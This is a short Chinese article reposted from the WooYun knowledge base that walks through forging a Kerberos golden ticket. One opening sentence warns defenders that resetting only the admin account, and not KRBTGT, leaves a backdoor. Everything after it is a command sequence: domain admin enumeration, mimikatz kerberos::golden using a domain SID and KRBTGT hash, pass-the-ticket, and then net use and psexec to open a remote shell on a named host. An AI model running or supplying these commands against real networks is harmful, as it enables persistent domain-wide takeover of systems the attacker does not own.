域渗透的金之钥匙

安全 网站安全
如果域控被入侵,仅仅重置域管理员账号,不重置KRBTGT账号,等于是给黑客留了一个后门。
C:\Users\hydra>net group "domain admins" /domain
C:\Users\hydra>whoami /user

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
责任编辑:蓝雨泪 来源: 乌云知识库
相关推荐

2021-10-11 10:39:13

内网信息收集

2016-03-22 10:14:25

域渗透渗透测试域控权限

2019-03-29 09:39:24

域渗透DNSWindows

2016-12-13 08:45:48

2020-09-28 10:03:36

渗透

2012-11-29 16:11:06

2014-06-09 14:18:24

2013-08-21 16:15:15

2012-11-28 17:51:50

2018-04-04 14:44:08

2018-11-26 14:52:12

Web前端跨域

2013-07-11 10:08:05

2016-03-18 15:09:37

2020-04-02 11:11:27

黑客网络安全域名采集

2016-05-31 10:11:51

2010-09-09 17:56:29

2017-04-13 17:20:21

深度学习神经网络

2017-04-19 09:15:57

深度学习

2013-09-05 10:07:34

javaScript变量
点赞
收藏

51CTO技术栈公众号